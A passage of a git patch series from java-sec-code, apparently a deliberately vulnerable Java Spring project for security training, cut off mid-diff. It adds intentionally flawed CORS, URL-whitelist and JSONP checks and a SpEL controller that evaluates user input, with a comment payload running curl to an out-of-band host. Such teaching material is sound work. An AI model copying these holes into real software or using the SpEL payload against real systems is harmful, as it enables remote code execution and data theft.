From 4cffffd87ebc2053ec84652e189f2932e0ea31be Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Thu, 25 Oct 2018 23:35:46 +0800
Subject: [PATCH 001/108] fix cors sec code

---
 README.md                                      |  1 +
 src/main/java/org/joychou/controller/CORS.java | 13 +++++++++++--
 2 files changed, 12 insertions(+), 2 deletions(-)

diff --git a/README.md b/README.md
index 42fb84dd..e0283efb 100644
--- a/README.md
+++ b/README.md
@@ -31,6 +31,7 @@
 - [XXE](https://github.com/JoyChou93/java-sec-code/wiki/XXE)
 - [SQLI](https://github.com/JoyChou93/java-sec-code/wiki/SQL-Inject)
 - [Fastjson](https://github.com/JoyChou93/java-sec-code/wiki/Fastjson)
+- [CORS](https://github.com/JoyChou93/java-sec-code/wiki/CORS)
 - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others)
 
 
diff --git a/src/main/java/org/joychou/controller/CORS.java b/src/main/java/org/joychou/controller/CORS.java
index 65e703fd..abf7c958 100644
--- a/src/main/java/org/joychou/controller/CORS.java
+++ b/src/main/java/org/joychou/controller/CORS.java
@@ -26,7 +26,7 @@ public class CORS {
      *
      * @param request
      * @param response
-     * @desc: 当origin为空，即直接访问的情况下，response的header中不会出现Access-Control-Allow-Origin
+     * @desc  https://github.com/JoyChou93/java-sec-code/wiki/CORS
      */
     @RequestMapping("/vuls1")
     @ResponseBody
@@ -61,7 +61,16 @@ private static String vuls3(HttpServletResponse response) {
     private static String seccode(HttpServletRequest request, HttpServletResponse response) {
         String origin = request.getHeader("Origin");
         Security sec = new Security();
-        if (!sec.checkSafeUrl(origin, urlwhitelist)) {
+        Boolean origin_safe = false;
+
+        // 如果origin为空，表示是同域过来的请求或者浏览器直接发起的请求，这种直接放过，没有安全问题。
+        if (origin == null) {
+            origin_safe = true;
+        }else if (sec.checkSafeUrl(origin, urlwhitelist)) {
+            origin_safe = true;
+        }
+
+        if (!origin_safe) {
             return "Origin is not safe.";
         }
         response.setHeader("Access-Control-Allow-Origin", "*");

From 571e0c3650f76cd6c20c10ee3bf4aa6a31e4113f Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 26 Oct 2018 09:41:09 +0800
Subject: [PATCH 002/108] bug fix

---
 src/main/java/org/joychou/controller/CORS.java | 8 +-------
 1 file changed, 1 insertion(+), 7 deletions(-)

diff --git a/src/main/java/org/joychou/controller/CORS.java b/src/main/java/org/joychou/controller/CORS.java
index abf7c958..4845715d 100644
--- a/src/main/java/org/joychou/controller/CORS.java
+++ b/src/main/java/org/joychou/controller/CORS.java
@@ -12,7 +12,7 @@
 /**
  * @author: JoyChou
  * @date:   2018年10月24日
- * @desc:   只要Access-Control-Allow-Origin为*，或者可被绕过，就存在CORS跨域
+ * @desc:   https://github.com/JoyChou93/java-sec-code/wiki/CORS
  */
 
 @Controller
@@ -22,12 +22,6 @@ public class CORS {
     protected static String info = "{\"name\": \"JoyChou\", \"phone\": \"18200001111\"}";
     protected static String[] urlwhitelist = {"joychou.com", "joychou.me"};
 
-    /**
-     *
-     * @param request
-     * @param response
-     * @desc  https://github.com/JoyChou93/java-sec-code/wiki/CORS
-     */
     @RequestMapping("/vuls1")
     @ResponseBody
     private static String vuls1(HttpServletRequest request, HttpServletResponse response) {

From e35f30e2d56d1aa1fa2791dc044355088f539efd Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 31 Oct 2018 18:48:17 +0800
Subject: [PATCH 003/108] add url whitelist vul code

---
 .../java/org/joychou/controller/URLWhiteList.java    | 12 ++++++++++++
 1 file changed, 12 insertions(+)

diff --git a/src/main/java/org/joychou/controller/URLWhiteList.java b/src/main/java/org/joychou/controller/URLWhiteList.java
index a63ae2cf..852fea6a 100644
--- a/src/main/java/org/joychou/controller/URLWhiteList.java
+++ b/src/main/java/org/joychou/controller/URLWhiteList.java
@@ -77,6 +77,18 @@ public String regex(HttpServletRequest request) throws Exception{
     }
 
 
+    @RequestMapping("/indexof")
+    @ResponseBody
+    public String indexOf(HttpServletRequest request) throws Exception{
+        String url = request.getParameter("url");
+        // indexof返回-1，表示没有匹配到字符串
+        if (-1 == url.indexOf(urlwhitelist)) {
+            return "URL is illegal";
+        } else {
+            return "URL is legal";
+        }
+    }
+
     // 安全代码
     @RequestMapping("/seccode")
     @ResponseBody

From ea9ad0e536a4c1321ddfea1208f641817a983daa Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Thu, 22 Nov 2018 23:33:47 +0800
Subject: [PATCH 004/108] udpate cors

---
 java-sec-code.iml                              |  2 +-
 src/main/java/org/joychou/controller/CORS.java | 14 ++++----------
 2 files changed, 5 insertions(+), 11 deletions(-)

diff --git a/java-sec-code.iml b/java-sec-code.iml
index bb761497..94c60cf7 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -59,7 +59,7 @@
     <orderEntry type="library" name="Maven: org.codehaus.groovy:groovy:2.4.7" level="project" />
     <orderEntry type="library" name="Maven: mysql:mysql-connector-java:8.0.12" level="project" />
     <orderEntry type="library" name="Maven: com.google.protobuf:protobuf-java:2.6.0" level="project" />
-    <orderEntry type="library" name="Maven: com.alibaba:fastjson:1.2.24" level="project" />
+    <orderEntry type="library" name="Maven: com.alibaba:fastjson:1.2.48" level="project" />
     <orderEntry type="library" name="Maven: org.jdom:jdom2:2.0.6" level="project" />
     <orderEntry type="library" name="Maven: org.dom4j:dom4j:2.1.1" level="project" />
     <orderEntry type="library" name="Maven: com.google.guava:guava:21.0" level="project" />
diff --git a/src/main/java/org/joychou/controller/CORS.java b/src/main/java/org/joychou/controller/CORS.java
index 4845715d..2b6dad34 100644
--- a/src/main/java/org/joychou/controller/CORS.java
+++ b/src/main/java/org/joychou/controller/CORS.java
@@ -30,7 +30,7 @@ private static String vuls1(HttpServletRequest request, HttpServletResponse resp
 
         response.setHeader("Access-Control-Allow-Origin", origin); // 设置Origin值为Header中获取到的
         // response.setHeader("Access-Control-Allow-Methods", "POST, GET");
-        // response.setHeader("Access-Control-Allow-Credentials", "true");  // cookie
+        response.setHeader("Access-Control-Allow-Credentials", "true");  // cookie
         return info;
     }
 
@@ -55,16 +55,10 @@ private static String vuls3(HttpServletResponse response) {
     private static String seccode(HttpServletRequest request, HttpServletResponse response) {
         String origin = request.getHeader("Origin");
         Security sec = new Security();
-        Boolean origin_safe = false;
 
-        // 如果origin为空，表示是同域过来的请求或者浏览器直接发起的请求，这种直接放过，没有安全问题。
-        if (origin == null) {
-            origin_safe = true;
-        }else if (sec.checkSafeUrl(origin, urlwhitelist)) {
-            origin_safe = true;
-        }
-
-        if (!origin_safe) {
+        // 如果origin不为空并且origin不在白名单内，认定为不安全。
+        // 如果origin为空，表示是同域过来的请求或者浏览器直接发起的请求。
+        if ( origin != null && !sec.checkSafeUrl(origin, urlwhitelist) ) {
             return "Origin is not safe.";
         }
         response.setHeader("Access-Control-Allow-Origin", "*");

From 76da5768c7e5df486c3cd7dde972bd841266357e Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Sun, 25 Nov 2018 20:12:01 +0800
Subject: [PATCH 005/108] update cors

---
 java-sec-code.iml                              |  2 +-
 pom.xml                                        |  6 ------
 src/main/java/org/joychou/controller/CORS.java | 11 ++++-------
 3 files changed, 5 insertions(+), 14 deletions(-)

diff --git a/java-sec-code.iml b/java-sec-code.iml
index 94c60cf7..bb761497 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -59,7 +59,7 @@
     <orderEntry type="library" name="Maven: org.codehaus.groovy:groovy:2.4.7" level="project" />
     <orderEntry type="library" name="Maven: mysql:mysql-connector-java:8.0.12" level="project" />
     <orderEntry type="library" name="Maven: com.google.protobuf:protobuf-java:2.6.0" level="project" />
-    <orderEntry type="library" name="Maven: com.alibaba:fastjson:1.2.48" level="project" />
+    <orderEntry type="library" name="Maven: com.alibaba:fastjson:1.2.24" level="project" />
     <orderEntry type="library" name="Maven: org.jdom:jdom2:2.0.6" level="project" />
     <orderEntry type="library" name="Maven: org.dom4j:dom4j:2.1.1" level="project" />
     <orderEntry type="library" name="Maven: com.google.guava:guava:21.0" level="project" />
diff --git a/pom.xml b/pom.xml
index a12f8f37..0a4983b2 100644
--- a/pom.xml
+++ b/pom.xml
@@ -82,12 +82,6 @@
             <version>21.0</version>
         </dependency>
 
-        <dependency>
-            <groupId>com.google.guava</groupId>
-            <artifactId>guava</artifactId>
-            <version>21.0</version>
-        </dependency>
-
         <dependency>
             <groupId>commons-collections</groupId>
             <artifactId>commons-collections</artifactId>
diff --git a/src/main/java/org/joychou/controller/CORS.java b/src/main/java/org/joychou/controller/CORS.java
index 2b6dad34..2974b64a 100644
--- a/src/main/java/org/joychou/controller/CORS.java
+++ b/src/main/java/org/joychou/controller/CORS.java
@@ -27,9 +27,7 @@ public class CORS {
     private static String vuls1(HttpServletRequest request, HttpServletResponse response) {
         // 获取Header中的Origin
         String origin = request.getHeader("origin");
-
         response.setHeader("Access-Control-Allow-Origin", origin); // 设置Origin值为Header中获取到的
-        // response.setHeader("Access-Control-Allow-Methods", "POST, GET");
         response.setHeader("Access-Control-Allow-Credentials", "true");  // cookie
         return info;
     }
@@ -37,9 +35,9 @@ private static String vuls1(HttpServletRequest request, HttpServletResponse resp
     @RequestMapping("/vuls2")
     @ResponseBody
     private static String vuls2(HttpServletResponse response) {
+        // 不建议设置为*
+        // 后端设置Access-Control-Allow-Origin为*的情况下，跨域的时候前端如果设置withCredentials为true会异常
         response.setHeader("Access-Control-Allow-Origin", "*");
-        // response.setHeader("Access-Control-Allow-Methods", "POST, GET");
-        // response.setHeader("Access-Control-Allow-Credentials", "true");
         return info;
     }
 
@@ -61,9 +59,8 @@ private static String seccode(HttpServletRequest request, HttpServletResponse re
         if ( origin != null && !sec.checkSafeUrl(origin, urlwhitelist) ) {
             return "Origin is not safe.";
         }
-        response.setHeader("Access-Control-Allow-Origin", "*");
-        // response.setHeader("Access-Control-Allow-Methods", "POST, GET");
-        // response.setHeader("Access-Control-Allow-Credentials", "true");
+        response.setHeader("Access-Control-Allow-Origin", origin);
+        response.setHeader("Access-Control-Allow-Credentials", "true");
         return info;
     }
 

From ca00956553404551c4c8a2c3ee238339b5688416 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Sun, 25 Nov 2018 20:25:59 +0800
Subject: [PATCH 006/108] update readme

---
 README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/README.md b/README.md
index e0283efb..3e950f3f 100644
--- a/README.md
+++ b/README.md
@@ -32,6 +32,7 @@
 - [SQLI](https://github.com/JoyChou93/java-sec-code/wiki/SQL-Inject)
 - [Fastjson](https://github.com/JoyChou93/java-sec-code/wiki/Fastjson)
 - [CORS](https://github.com/JoyChou93/java-sec-code/wiki/CORS)
+- [CSRF](https://github.com/JoyChou93/java-sec-code/wiki/CSRF)
 - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others)
 
 

From 2f6c3cf62d35ca924f512ea30ffe751177f5d14c Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Thu, 17 Jan 2019 15:07:58 +0800
Subject: [PATCH 007/108] add spel, fixes #5

---
 java-sec-code.iml                             |  9 +++++
 .../java/org/joychou/controller/SPEL.java     | 37 +++++++++++++++++++
 src/main/resources/templates/upload.html      |  2 +-
 3 files changed, 47 insertions(+), 1 deletion(-)
 create mode 100644 src/main/java/org/joychou/controller/SPEL.java

diff --git a/java-sec-code.iml b/java-sec-code.iml
index bb761497..b1ff9d07 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -22,6 +22,15 @@
     </content>
     <orderEntry type="inheritedJdk" />
     <orderEntry type="sourceFolder" forTests="false" />
+    <orderEntry type="module-library">
+      <library>
+        <CLASSES>
+          <root url="jar://$USER_HOME$/Desktop/challenge-0.0.1-SNAPSHOT.jar!/" />
+        </CLASSES>
+        <JAVADOC />
+        <SOURCES />
+      </library>
+    </orderEntry>
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-web:1.5.1.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter:1.5.1.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot:1.5.1.RELEASE" level="project" />
diff --git a/src/main/java/org/joychou/controller/SPEL.java b/src/main/java/org/joychou/controller/SPEL.java
new file mode 100644
index 00000000..481aed46
--- /dev/null
+++ b/src/main/java/org/joychou/controller/SPEL.java
@@ -0,0 +1,37 @@
+package org.joychou.controller;
+
+import org.springframework.expression.ExpressionParser;
+import org.springframework.expression.spel.standard.SpelExpressionParser;
+import org.springframework.stereotype.Controller;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.ResponseBody;
+import javax.servlet.http.HttpServletRequest;
+
+/*
+    * Author: JoyChou
+    * Date:   2019年01月17日
+    * Desc:   SPEL导致的RCE
+    * Usage:  http://localhost:8080/spel/rce?expression=xxx(xxx为exp的URL编码后的值)
+    * Exp:    T(java.lang.Runtime).getRuntime().exec("curl xxx.ceye.io")
+ */
+
+@Controller
+@RequestMapping("/spel")
+public class SPEL {
+
+    @RequestMapping("/rce")
+    @ResponseBody
+    private static String rce(HttpServletRequest request) {
+        String expression = request.getParameter("expression");
+        ExpressionParser parser = new SpelExpressionParser();
+        String result = parser.parseExpression(expression).getValue().toString();
+        return result;
+    }
+
+    public static void main(String[] args)  {
+        ExpressionParser parser = new SpelExpressionParser();
+        String expression = "T(java.lang.Runtime).getRuntime().exec(\"open -a Calculator\")";
+        String result = parser.parseExpression(expression).getValue().toString();
+    }
+}
+
diff --git a/src/main/resources/templates/upload.html b/src/main/resources/templates/upload.html
index 309faa9c..10898e0b 100755
--- a/src/main/resources/templates/upload.html
+++ b/src/main/resources/templates/upload.html
@@ -4,7 +4,7 @@
 
 <h3>file upload</h3>
 
-<form method="POST" action="/file/upload" enctype="multipart/form-data">
+<form method="POST" action="upload" enctype="multipart/form-data">
     <input type="file" name="file" /><br/><br/>
     <input type="submit" value="Submit" />
 </form>

From 56d5ba19b4ab2677dbed8c2c957659868bd1082f Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Thu, 17 Jan 2019 15:12:53 +0800
Subject: [PATCH 008/108] update readme

---
 README.md | 1 +
 1 file changed, 1 insertion(+)

diff --git a/README.md b/README.md
index 3e950f3f..7f3f10e2 100644
--- a/README.md
+++ b/README.md
@@ -23,6 +23,7 @@
 - [Fastjson](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Fastjson.java)
 - [CORS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/CORS.java)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/JSONP.java)
+- [SPEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SPEL.java)
 
 
 ## 漏洞说明

From 48e347c6241ad60378c0e2cc3fd92af0f36337b3 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Mon, 28 Jan 2019 20:51:16 +0800
Subject: [PATCH 009/108] add emptyReferer of jsonp

---
 README.md                                     |  1 +
 .../java/org/joychou/controller/JSONP.java    | 21 +++++++++++++++++++
 2 files changed, 22 insertions(+)

diff --git a/README.md b/README.md
index 7f3f10e2..13767e88 100644
--- a/README.md
+++ b/README.md
@@ -34,6 +34,7 @@
 - [Fastjson](https://github.com/JoyChou93/java-sec-code/wiki/Fastjson)
 - [CORS](https://github.com/JoyChou93/java-sec-code/wiki/CORS)
 - [CSRF](https://github.com/JoyChou93/java-sec-code/wiki/CSRF)
+- [JSONP](https://github.com/JoyChou93/java-sec-code/wiki/JSONP)
 - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others)
 
 
diff --git a/src/main/java/org/joychou/controller/JSONP.java b/src/main/java/org/joychou/controller/JSONP.java
index 6913e903..67dda97e 100644
--- a/src/main/java/org/joychou/controller/JSONP.java
+++ b/src/main/java/org/joychou/controller/JSONP.java
@@ -30,6 +30,27 @@ private static String referer(HttpServletRequest request, HttpServletResponse re
         return callback + "(" + info + ")";
     }
 
+    /**
+     * Desc: 直接访问不限制Referer，非直接访问限制Referer (开发同学喜欢这样进行JSONP测试)
+     * URL:  http://localhost:8080/jsonp/emptyReferer?callback=test
+     */
+    @RequestMapping("/emptyReferer")
+    @ResponseBody
+    private static String emptyReferer(HttpServletRequest request, HttpServletResponse response) {
+        String referer = request.getHeader("referer");
+        response.setHeader("Access-Control-Allow-Origin", "*");
+        if (null == referer) {
+            String callback = request.getParameter("callback");
+            return callback + "(" + info + ")";
+        } else {
+            Security sec = new Security();
+            if (!sec.checkSafeUrl(referer, urlwhitelist)) {
+                return "Referer is not safe.";
+            }
+            String callback = request.getParameter("callback");
+            return callback + "(" + info + ")";
+        }
+    }
 
     // http://localhost:8080/jsonp/sec?callback=test
     @RequestMapping("/sec")

From 674f2f125aa488983d36017272cbfa7912ec13a6 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Tue, 26 Feb 2019 16:50:33 +0800
Subject: [PATCH 010/108] =?UTF-8?q?=E9=80=82=E9=85=8D=E5=9C=A8IDEA?=
 =?UTF-8?q?=E4=B8=AD=E5=8F=B3=E9=94=AE=E7=9B=B4=E6=8E=A5=E8=BF=90=E8=A1=8C?=
 =?UTF-8?q?=E5=BA=94=E7=94=A8?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 README.md         |   7 +++
 java-sec-code.iml |   5 +-
 pom-extra.xml     | 132 ++++++++++++++++++++++++++++++++++++++++++++++
 pom-idea.xml      | 118 +++++++++++++++++++++++++++++++++++++++++
 pom.xml           |  14 -----
 5 files changed, 261 insertions(+), 15 deletions(-)
 create mode 100644 pom-extra.xml
 create mode 100644 pom-idea.xml

diff --git a/README.md b/README.md
index 13767e88..b23ce565 100644
--- a/README.md
+++ b/README.md
@@ -80,3 +80,10 @@ http://localhost:8080/rce/exec?cmd=whoami
 Viarus
 ```
 
+--- 
+
+有人反馈不想额外下载Tomcat，想使用SpringBoot自带的Tomcat，所以额外添加了这个小功能。
+执行`cp pom-idea.xml pom.xml`后，最后在IDEA中右键`Run Application`。
+
+
+
diff --git a/java-sec-code.iml b/java-sec-code.iml
index b1ff9d07..76d1049c 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -43,6 +43,10 @@
     <orderEntry type="library" name="Maven: org.slf4j:log4j-over-slf4j:1.7.22" level="project" />
     <orderEntry type="library" name="Maven: org.springframework:spring-core:4.3.6.RELEASE" level="project" />
     <orderEntry type="library" scope="RUNTIME" name="Maven: org.yaml:snakeyaml:1.17" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-tomcat:1.5.1.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-core:8.5.11" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-el:8.5.11" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-websocket:8.5.11" level="project" />
     <orderEntry type="library" name="Maven: org.hibernate:hibernate-validator:5.3.4.Final" level="project" />
     <orderEntry type="library" name="Maven: javax.validation:validation-api:1.1.0.Final" level="project" />
     <orderEntry type="library" name="Maven: org.jboss.logging:jboss-logging:3.3.0.Final" level="project" />
@@ -56,7 +60,6 @@
     <orderEntry type="library" name="Maven: org.springframework:spring-context:4.3.6.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.springframework:spring-webmvc:4.3.6.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.springframework:spring-expression:4.3.6.RELEASE" level="project" />
-    <orderEntry type="library" scope="PROVIDED" name="Maven: org.apache.tomcat:tomcat-servlet-api:8.0.36" level="project" />
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-thymeleaf:1.5.1.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.thymeleaf:thymeleaf-spring4:2.1.5.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.thymeleaf:thymeleaf:2.1.5.RELEASE" level="project" />
diff --git a/pom-extra.xml b/pom-extra.xml
new file mode 100644
index 00000000..0a4983b2
--- /dev/null
+++ b/pom-extra.xml
@@ -0,0 +1,132 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>sec</groupId>
+    <artifactId>java-sec-code</artifactId>
+    <version>1.0.0</version>
+    <packaging>war</packaging>
+
+
+    <parent>
+        <groupId>org.springframework.boot</groupId>
+        <artifactId>spring-boot-starter-parent</artifactId>
+        <version>1.5.1.RELEASE</version>
+    </parent>
+
+    <dependencies>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-web</artifactId>
+            <!-- 移除嵌入式tomcat插件，为了使用非嵌入式的tomcat -->
+            <exclusions>
+                <exclusion>
+                    <groupId>org.springframework.boot</groupId>
+                    <artifactId>spring-boot-starter-tomcat</artifactId>
+                </exclusion>
+            </exclusions>
+        </dependency>
+
+        <!-- 添加tomcat servlet api -->
+        <dependency>
+            <groupId>org.apache.tomcat</groupId>
+            <artifactId>tomcat-servlet-api</artifactId>
+            <version>8.0.36</version>
+            <scope>provided</scope>
+        </dependency>
+
+        <!-- 添加thymeleaf为了动态解析html-->
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-thymeleaf</artifactId>
+        </dependency>
+
+        <!-- 处理jdbc的mysql连接-->
+        <dependency>
+            <groupId>mysql</groupId>
+            <artifactId>mysql-connector-java</artifactId>
+            <version>8.0.12</version>
+        </dependency>
+
+        <!-- 处理json数据 -->
+        <!-- https://mvnrepository.com/artifact/com.alibaba/fastjson -->
+        <dependency>
+            <groupId>com.alibaba</groupId>
+            <artifactId>fastjson</artifactId>
+            <version>1.2.24</version>
+        </dependency>
+
+
+        <!-- jdom解析xml 最新版本为2.0.6 时间为2015-02-28 https://github.com/hunterhacker/jdom/releases-->
+        <!-- https://mvnrepository.com/artifact/org.jdom/jdom2 -->
+        <dependency>
+            <groupId>org.jdom</groupId>
+            <artifactId>jdom2</artifactId>
+            <version>2.0.6</version>
+        </dependency>
+
+        <!-- https://mvnrepository.com/artifact/org.dom4j/dom4j -->
+        <dependency>
+            <groupId>org.dom4j</groupId>
+            <artifactId>dom4j</artifactId>
+            <version>2.1.1</version>
+        </dependency>
+
+
+        <!-- 获取url根域名-->
+        <dependency>
+            <groupId>com.google.guava</groupId>
+            <artifactId>guava</artifactId>
+            <version>21.0</version>
+        </dependency>
+
+        <dependency>
+            <groupId>commons-collections</groupId>
+            <artifactId>commons-collections</artifactId>
+            <version>3.1</version>
+        </dependency>
+
+        <dependency>
+            <groupId>commons-lang</groupId>
+            <artifactId>commons-lang</artifactId>
+            <version>2.4</version> </dependency>
+
+        <dependency>
+            <groupId>org.apache.httpcomponents</groupId>
+            <artifactId>httpclient</artifactId>
+            <version>4.3.6</version>
+        </dependency>
+        <dependency>
+            <groupId>org.apache.httpcomponents</groupId>
+            <artifactId>fluent-hc</artifactId>
+            <version>4.3.6</version>
+        </dependency>
+
+
+        <dependency>
+            <groupId>org.apache.logging.log4j</groupId>
+            <artifactId>log4j-core</artifactId>
+            <version>2.8.2</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.squareup.okhttp</groupId>
+            <artifactId>okhttp</artifactId>
+            <version>2.5.0</version>
+        </dependency>
+
+
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-digester3</artifactId>
+            <version>3.2</version>
+        </dependency>
+
+    </dependencies>
+
+
+
+
+</project>
\ No newline at end of file
diff --git a/pom-idea.xml b/pom-idea.xml
new file mode 100644
index 00000000..8f44e785
--- /dev/null
+++ b/pom-idea.xml
@@ -0,0 +1,118 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+
+    <groupId>sec</groupId>
+    <artifactId>java-sec-code</artifactId>
+    <version>1.0.0</version>
+    <packaging>war</packaging>
+
+
+    <parent>
+        <groupId>org.springframework.boot</groupId>
+        <artifactId>spring-boot-starter-parent</artifactId>
+        <version>1.5.1.RELEASE</version>
+    </parent>
+
+    <dependencies>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-web</artifactId>
+        </dependency>
+
+
+        <!-- 添加thymeleaf为了动态解析html-->
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-thymeleaf</artifactId>
+        </dependency>
+
+        <!-- 处理jdbc的mysql连接-->
+        <dependency>
+            <groupId>mysql</groupId>
+            <artifactId>mysql-connector-java</artifactId>
+            <version>8.0.12</version>
+        </dependency>
+
+        <!-- 处理json数据 -->
+        <!-- https://mvnrepository.com/artifact/com.alibaba/fastjson -->
+        <dependency>
+            <groupId>com.alibaba</groupId>
+            <artifactId>fastjson</artifactId>
+            <version>1.2.24</version>
+        </dependency>
+
+
+        <!-- jdom解析xml 最新版本为2.0.6 时间为2015-02-28 https://github.com/hunterhacker/jdom/releases-->
+        <!-- https://mvnrepository.com/artifact/org.jdom/jdom2 -->
+        <dependency>
+            <groupId>org.jdom</groupId>
+            <artifactId>jdom2</artifactId>
+            <version>2.0.6</version>
+        </dependency>
+
+        <!-- https://mvnrepository.com/artifact/org.dom4j/dom4j -->
+        <dependency>
+            <groupId>org.dom4j</groupId>
+            <artifactId>dom4j</artifactId>
+            <version>2.1.1</version>
+        </dependency>
+
+
+        <!-- 获取url根域名-->
+        <dependency>
+            <groupId>com.google.guava</groupId>
+            <artifactId>guava</artifactId>
+            <version>21.0</version>
+        </dependency>
+
+        <dependency>
+            <groupId>commons-collections</groupId>
+            <artifactId>commons-collections</artifactId>
+            <version>3.1</version>
+        </dependency>
+
+        <dependency>
+            <groupId>commons-lang</groupId>
+            <artifactId>commons-lang</artifactId>
+            <version>2.4</version> </dependency>
+
+        <dependency>
+            <groupId>org.apache.httpcomponents</groupId>
+            <artifactId>httpclient</artifactId>
+            <version>4.3.6</version>
+        </dependency>
+        <dependency>
+            <groupId>org.apache.httpcomponents</groupId>
+            <artifactId>fluent-hc</artifactId>
+            <version>4.3.6</version>
+        </dependency>
+
+
+        <dependency>
+            <groupId>org.apache.logging.log4j</groupId>
+            <artifactId>log4j-core</artifactId>
+            <version>2.8.2</version>
+        </dependency>
+
+        <dependency>
+            <groupId>com.squareup.okhttp</groupId>
+            <artifactId>okhttp</artifactId>
+            <version>2.5.0</version>
+        </dependency>
+
+
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-digester3</artifactId>
+            <version>3.2</version>
+        </dependency>
+
+    </dependencies>
+
+
+
+
+</project>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index 0a4983b2..8f44e785 100644
--- a/pom.xml
+++ b/pom.xml
@@ -20,22 +20,8 @@
         <dependency>
             <groupId>org.springframework.boot</groupId>
             <artifactId>spring-boot-starter-web</artifactId>
-            <!-- 移除嵌入式tomcat插件，为了使用非嵌入式的tomcat -->
-            <exclusions>
-                <exclusion>
-                    <groupId>org.springframework.boot</groupId>
-                    <artifactId>spring-boot-starter-tomcat</artifactId>
-                </exclusion>
-            </exclusions>
         </dependency>
 
-        <!-- 添加tomcat servlet api -->
-        <dependency>
-            <groupId>org.apache.tomcat</groupId>
-            <artifactId>tomcat-servlet-api</artifactId>
-            <version>8.0.36</version>
-            <scope>provided</scope>
-        </dependency>
 
         <!-- 添加thymeleaf为了动态解析html-->
         <dependency>

From 453e1949f0c8a8e2e2b2f391040f1b2824869659 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 27 Feb 2019 10:18:17 +0800
Subject: [PATCH 011/108] add jar configure

---
 README.md     | 25 ++++++++++++++++++++++---
 pom-extra.xml |  9 ++++++++-
 pom-idea.xml  |  9 ++++++++-
 pom.xml       | 10 +++++++++-
 4 files changed, 47 insertions(+), 6 deletions(-)

diff --git a/README.md b/README.md
index b23ce565..cabdc572 100644
--- a/README.md
+++ b/README.md
@@ -80,10 +80,29 @@ http://localhost:8080/rce/exec?cmd=whoami
 Viarus
 ```
 
---- 
+---
 
-有人反馈不想额外下载Tomcat，想使用SpringBoot自带的Tomcat，所以额外添加了这个小功能。
-执行`cp pom-idea.xml pom.xml`后，最后在IDEA中右键`Run Application`。
+有人反馈不想额外下载Tomcat，想使用SpringBoot自带的Tomcat，所以额外说明。
 
+具体操作：执行`cp pom-idea.xml pom.xml`后，最后在IDEA中右键`Run Application`。
 
+### Jar包
 
+
+有人反馈想直接打Jar包运行。具体操作：
+
+先修改pom.xml里的配置，将war改成jar
+
+``` 
+    <groupId>sec</groupId>
+    <artifactId>java-sec-code</artifactId>
+    <version>1.0.0</version>
+    <packaging>war</packaging>
+```
+
+再打包运行即可。
+
+```
+mvn clean package -DskipTests 
+java -jar 打包后的jar包路径
+```
diff --git a/pom-extra.xml b/pom-extra.xml
index 0a4983b2..d91e6c0e 100644
--- a/pom-extra.xml
